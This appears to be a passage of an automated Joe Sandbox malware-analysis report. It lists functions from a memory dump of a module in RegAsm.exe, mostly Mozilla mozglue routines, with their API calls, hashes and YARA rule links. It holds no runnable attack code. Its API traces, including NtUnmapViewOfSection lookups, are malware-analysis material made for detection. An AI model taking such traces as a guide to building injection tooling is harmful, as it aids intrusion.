                                                                                                                                                        • String ID: NtQueryVirtualMemory$ntdll.dll
                                                                                                                                                        • API String ID: 145871493-2623246514
                                                                                                                                                        • Opcode ID: ee3401805ec32a786a604b6db8717c010fedbb148bce3ef80363caee91059155
                                                                                                                                                        • Instruction ID: 5cfe795fac5b77f9ccb397429677264946dda913b82415e14f18a83a95d3b1f0
                                                                                                                                                        • Opcode Fuzzy Hash: ee3401805ec32a786a604b6db8717c010fedbb148bce3ef80363caee91059155
                                                                                                                                                        • Instruction Fuzzy Hash: 0DE092B0703301BFDF00BB73899CB127AF8AB4B344F804516EA0591A10EBB0C016CA7E
                                                                                                                                                        Function 6C6675B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C66748B,?), ref: 6C6675B8
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 6C6675D7
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C66748B,?), ref: 6C6675EC
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: RtlNtStatusToDosError$ntdll.dll
                                                                                                                                                        • API String ID: 145871493-3641475894
                                                                                                                                                        • Opcode ID: 7e6ff57cceb59d24331dc3963762dbd6da4ec3f726b12749f414e30739b3da78
                                                                                                                                                        • Instruction ID: 96132b4c46dd04ddc4173254d5b635ba62d537ab7d87c4969530a8a302b35a06
                                                                                                                                                        • Opcode Fuzzy Hash: 7e6ff57cceb59d24331dc3963762dbd6da4ec3f726b12749f414e30739b3da78
                                                                                                                                                        • Instruction Fuzzy Hash: 02E07571602301BBFF005BA398C87027AF8E787354F604425EA05D1A10DBB48046CF3E
                                                                                                                                                        Function 6C667600 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • LoadLibraryW.KERNEL32(ntdll.dll,?,6C667592), ref: 6C667608
                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 6C667627
                                                                                                                                                        • FreeLibrary.KERNEL32(?,6C667592), ref: 6C66763C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$AddressFreeLoadProc
                                                                                                                                                        • String ID: NtUnmapViewOfSection$ntdll.dll
                                                                                                                                                        • API String ID: 145871493-1050664331
                                                                                                                                                        • Opcode ID: 7ef78ed9f2fb0885fd0a7d6a919cd52de3a9b7bc3fcd8c4393c6c0b06b91a0a9
                                                                                                                                                        • Instruction ID: fc248b39275b458335835aa2b4e21c4fbd6278bda9c40b57faf869e4aef0f387
                                                                                                                                                        • Opcode Fuzzy Hash: 7ef78ed9f2fb0885fd0a7d6a919cd52de3a9b7bc3fcd8c4393c6c0b06b91a0a9
                                                                                                                                                        • Instruction Fuzzy Hash: FFE09A70603301BBEF005BA7AC9C7017AB8E75B399F008515EA06D1A10D7B180058F3E
                                                                                                                                                        Function 6C66BE50 Relevance: 7.7, APIs: 5, Instructions: 163memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • memset.VCRUNTIME140(?,00000000,?,?,6C66BE49), ref: 6C66BEC4
                                                                                                                                                        • RtlCaptureStackBackTrace.NTDLL ref: 6C66BEDE
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,-00000008,?,6C66BE49), ref: 6C66BF38
                                                                                                                                                        • RtlReAllocateHeap.NTDLL ref: 6C66BF83
                                                                                                                                                        • RtlFreeHeap.NTDLL ref: 6C66BFA6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Heapmemset$AllocateBackCaptureFreeStackTrace
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2764315370-0
                                                                                                                                                        • Opcode ID: 97a51bea5beafe8c0eb686af4ddfb89c782d482da79f7e262b467a0aa2fbeb1d
                                                                                                                                                        • Instruction ID: cbb4e27f3ebca2190dcc547ad4306ba0b7291df89e3016747826342b523aba94
                                                                                                                                                        • Opcode Fuzzy Hash: 97a51bea5beafe8c0eb686af4ddfb89c782d482da79f7e262b467a0aa2fbeb1d
                                                                                                                                                        • Instruction Fuzzy Hash: 4451A071A002018FE710CF6ACD80B9AB3A6FFC9314F294639E516A7F54D730F9069B95
                                                                                                                                                        Function 6C658E00 Relevance: 7.6, APIs: 6, Instructions: 147COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,6C64B58D,?,?,?,?,?,?,?,6C67D734,?,?,?,6C67D734), ref: 6C658E6E
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C64B58D,?,?,?,?,?,?,?,6C67D734,?,?,?,6C67D734), ref: 6C658EBF
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,6C64B58D,?,?,?,?,?,?,?,6C67D734,?,?,?), ref: 6C658F24
                                                                                                                                                        • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000004,?,?,6C64B58D,?,?,?,?,?,?,?,6C67D734,?,?,?,6C67D734), ref: 6C658F46
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,6C64B58D,?,?,?,?,?,?,?,6C67D734,?,?,?), ref: 6C658F7A
                                                                                                                                                        • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C64B58D,?,?,?,?,?,?,?,6C67D734,?,?,?), ref: 6C658F8F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: freemalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3061335427-0
                                                                                                                                                        • Opcode ID: 8fd28932e3063aec005875cdd026f0097d67e1652ea5a622870216970ae6fd68
                                                                                                                                                        • Instruction ID: 987cba553a99a368fcd070b8628113b04ef9bde27404575d4275d4441f3d6921
                                                                                                                                                        • Opcode Fuzzy Hash: 8fd28932e3063aec005875cdd026f0097d67e1652ea5a622870216970ae6fd68
                                                                                                                                                        • Instruction Fuzzy Hash: 235104B1A112168FEB10CF54D8807AE73B2FF4D348F64052AD516ABB10E732F915CB99
                                                                                                                                                        Function 6C604DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C604E5A
                                                                                                                                                        • ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C604E97
                                                                                                                                                        • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C604EE9
                                                                                                                                                        • memcpy.VCRUNTIME140(?,?,00000000), ref: 6C604F02
                                                                                                                                                        • ?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C604F1E
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 713647276-0
                                                                                                                                                        • Opcode ID: b817bfb457213eaabd68eef87558a127f2e7827f64ecedb7f1105e81692ab075
                                                                                                                                                        • Instruction ID: 04074866a4ee2ab4794bcecce27590a286346cb6f9b55ecec413e165574491a5
                                                                                                                                                        • Opcode Fuzzy Hash: b817bfb457213eaabd68eef87558a127f2e7827f64ecedb7f1105e81692ab075
                                                                                                                                                        • Instruction Fuzzy Hash: 2541F0716047019FC729CF29C4809ABB7E4FFDA344F108A1DF566A7640DBB0E915CB99
                                                                                                                                                        Function 6C611530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(-00000002,?,6C61152B,?,?,?,?,6C611248,?), ref: 6C61159C
                                                                                                                                                        • memcpy.VCRUNTIME140(00000023,?,?,?,?,6C61152B,?,?,?,?,6C611248,?), ref: 6C6115BC
                                                                                                                                                        • moz_xmalloc.MOZGLUE(-00000001,?,6C61152B,?,?,?,?,6C611248,?), ref: 6C6115E7
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,?,?,6C61152B,?,?,?,?,6C611248,?), ref: 6C611606
                                                                                                                                                        • _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C61152B,?,?,?,?,6C611248,?), ref: 6C611637
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 733145618-0
                                                                                                                                                        • Opcode ID: c7c01a9eefaefffef63c5e80929f5f3a9b08d63468e7254f1aae503bb0f8666c
                                                                                                                                                        • Instruction ID: d147d18a3aa772daf5bebde75902c3345ad289967b3fce77594bdea63fde694f
                                                                                                                                                        • Opcode Fuzzy Hash: c7c01a9eefaefffef63c5e80929f5f3a9b08d63468e7254f1aae503bb0f8666c
                                                                                                                                                        • Instruction Fuzzy Hash: 7531D8B1A081149BC7148E7CD8504AE77A5AB923757240B2DE423DBFD4EB31D9058799
                                                                                                                                                        Function 6C66AD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C67E330,?,6C62C059), ref: 6C66AD9D
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C67E330,?,6C62C059), ref: 6C66ADAC
                                                                                                                                                        • free.MOZGLUE(?,?,?,?,00000000,?,?,6C67E330,?,6C62C059), ref: 6C66AE01
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,?,?,6C67E330,?,6C62C059), ref: 6C66AE1D
                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C67E330,?,6C62C059), ref: 6C66AE3D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$freemallocmemsetmoz_xmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3161513745-0
                                                                                                                                                        • Opcode ID: 92208dacee2bc5595d532341977f513bf2c66b543392e6ac091dd4495eec99be
                                                                                                                                                        • Instruction ID: c59e9b5c099b4132132b3608672de6dc5638d4d3e73e6ce109e78fc0ad0e7b7d
                                                                                                                                                        • Opcode Fuzzy Hash: 92208dacee2bc5595d532341977f513bf2c66b543392e6ac091dd4495eec99be
                                                                                                                                                        • Instruction Fuzzy Hash: FA3171B1A00215AFDB10DF7A8C44AABB7F8EF49610F148829E85AD7701E7349805CBB9
                                                                                                                                                        Function 6C665EF0 Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • ?_Ipfx@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE_N_N@Z.MSVCP140(00000001,00000000,6C67DCA0,?,?,?,6C63E8B5,00000000), ref: 6C665F1F
                                                                                                                                                        • ?sgetc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C63E8B5,00000000), ref: 6C665F4B
                                                                                                                                                        • ?snextc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(00000000,?,6C63E8B5,00000000), ref: 6C665F7B
                                                                                                                                                        • ?clear@?$basic_ios@DU?$char_traits@D@std@@@std@@QAEXH_N@Z.MSVCP140(6E65475B,00000000,?,6C63E8B5,00000000), ref: 6C665F9F
                                                                                                                                                        • ?sbumpc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QAEHXZ.MSVCP140(?,6C63E8B5,00000000), ref: 6C665FD6
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: D@std@@@std@@U?$char_traits@$?clear@?$basic_ios@?sbumpc@?$basic_streambuf@?sgetc@?$basic_streambuf@?snextc@?$basic_streambuf@Ipfx@?$basic_istream@
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1389714915-0
                                                                                                                                                        • Opcode ID: 6539b72cb9e04e2aefd2522d7d9276e05b7179acef29cce350a3a3d6845e2bac
                                                                                                                                                        • Instruction ID: 2190d97c6033dc8d5561c455495e6fc337910c137784b7824c78c4ce6a3dfee3
                                                                                                                                                        • Opcode Fuzzy Hash: 6539b72cb9e04e2aefd2522d7d9276e05b7179acef29cce350a3a3d6845e2bac
                                                                                                                                                        • Instruction Fuzzy Hash: F53127343006009FD710CF2AC8D8A2AB7F9BF8A319F648558E5568BB96CB71EC41CF95
                                                                                                                                                        Function 6C60B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 6C60B532
                                                                                                                                                        • moz_xmalloc.MOZGLUE(?), ref: 6C60B55B
                                                                                                                                                        • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C60B56B
                                                                                                                                                        • wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C60B57E
                                                                                                                                                        • free.MOZGLUE(00000000), ref: 6C60B58F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: HandleModulefreememsetmoz_xmallocwcsncpy_s
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4244350000-0
                                                                                                                                                        • Opcode ID: 68cb9975ab52766f2d18543301fff3b517079952a3c74bb60ea053b6b5f57e31
                                                                                                                                                        • Instruction ID: 13b0675b588e699c9e3430023f96f5d8cb3278aba98858544f2d8d000e155a07
                                                                                                                                                        • Opcode Fuzzy Hash: 68cb9975ab52766f2d18543301fff3b517079952a3c74bb60ea053b6b5f57e31
                                                                                                                                                        • Instruction Fuzzy Hash: 57210A717002059BDB018F69CD80BAEBBB9FF86308F248169E914EB341E775D911C7A5
                                                                                                                                                        Function 6C666E50 Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • MozDescribeCodeAddress.MOZGLUE(?,?), ref: 6C666E78
                                                                                                                                                          • Part of subcall function 6C666A10: InitializeCriticalSection.KERNEL32(6C68F618), ref: 6C666A68
                                                                                                                                                          • Part of subcall function 6C666A10: GetCurrentProcess.KERNEL32 ref: 6C666A7D
                                                                                                                                                          • Part of subcall function 6C666A10: GetCurrentProcess.KERNEL32 ref: 6C666AA1
                                                                                                                                                          • Part of subcall function 6C666A10: EnterCriticalSection.KERNEL32(6C68F618), ref: 6C666AAE
                                                                                                                                                          • Part of subcall function 6C666A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C666AE1
                                                                                                                                                          • Part of subcall function 6C666A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100), ref: 6C666B15
                                                                                                                                                          • Part of subcall function 6C666A10: strncpy.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000100,?,?), ref: 6C666B65
                                                                                                                                                          • Part of subcall function 6C666A10: LeaveCriticalSection.KERNEL32(6C68F618,?,?), ref: 6C666B83
                                                                                                                                                        • MozFormatCodeAddress.MOZGLUE ref: 6C666EC1
                                                                                                                                                        • fflush.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C666EE1
                                                                                                                                                        • _fileno.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C666EED
                                                                                                                                                        • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000400), ref: 6C666EFF
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CriticalSectionstrncpy$AddressCodeCurrentProcess$DescribeEnterFormatInitializeLeave_fileno_writefflush
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4058739482-0
                                                                                                                                                        • Opcode ID: 7d9073b9f6862dea7e7640b0704568c9d33000e09e2ff56e28f9ccb84acb69e3
                                                                                                                                                        • Instruction ID: 1eb92e32019038e614a4027c3eae9d0dd9a252b5bb82d2467e635d6556b7e24c
                                                                                                                                                        • Opcode Fuzzy Hash: 7d9073b9f6862dea7e7640b0704568c9d33000e09e2ff56e28f9ccb84acb69e3
                                                                                                                                                        • Instruction Fuzzy Hash: B421A471A0421A9FDB00CF6AE8C56DE77F5EF85308F044439E80997341DB709A59CFA6
                                                                                                                                                        Function 6C640D60 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 41memoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000,00003000,00003000,?,6C603DEF), ref: 6C640D71
                                                                                                                                                        • VirtualAlloc.KERNEL32(?,08000000,00003000,00000004,?,6C603DEF), ref: 6C640D84
                                                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,6C603DEF), ref: 6C640DAF
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Virtual$Free$Alloc
                                                                                                                                                        • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                        • API String ID: 1852963964-2186867486
                                                                                                                                                        • Opcode ID: 944008e0cdc31905b22db09adedadaf2fa2e36eaf5d12f577bf0dd8aa4c549a9
                                                                                                                                                        • Instruction ID: fa76a48f4d8e1f504d0a689103bbb85100d893a9ee786e18a95612010942af14
                                                                                                                                                        • Opcode Fuzzy Hash: 944008e0cdc31905b22db09adedadaf2fa2e36eaf5d12f577bf0dd8aa4c549a9
                                                                                                                                                        • Instruction Fuzzy Hash: 29F089713822A433E72415665C1AB6A379EABD3B65F35C035F224DA9C0DA90E40886BD
                                                                                                                                                        Function 6C657620 Relevance: 7.5, APIs: 5, Instructions: 35threadCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • moz_xmalloc.MOZGLUE(0000002C,?,?,?,?,6C6575C4,?), ref: 6C65762B
                                                                                                                                                          • Part of subcall function 6C61CA10: malloc.MOZGLUE(?), ref: 6C61CA26
                                                                                                                                                        • InitializeConditionVariable.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,6C6574D7,6C6615FC,?,?,?), ref: 6C657644
                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 6C65765A
                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6574D7,6C6615FC,?,?,?), ref: 6C657663
                                                                                                                                                        • ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6C6574D7,6C6615FC,?,?,?), ref: 6C657677
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000003.00000002.2837734049.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                                                                                                                                        • Associated: 00000003.00000002.2837712512.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838097212.000000006C67D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838199124.000000006C68E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        • Associated: 00000003.00000002.2838225256.000000006C692000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c600000_RegAsm.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ExclusiveLock$AcquireConditionCurrentInitializeReleaseThreadVariablemallocmoz_xmalloc
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 418114769-0
                                                                                                                                                        • Opcode ID: d65ab9029d2dff16201d9816a51a7cba7fc987a8ede617b3f54229f8d6fb6f80
                                                                                                                                                        • Instruction ID: 0a45fcd0a4dab4d8a0fa478946c7a1765c6f698398b9c3082a0cac7032a1f63d
                                                                                                                                                        • Opcode Fuzzy Hash: d65ab9029d2dff16201d9816a51a7cba7fc987a8ede617b3f54229f8d6fb6f80
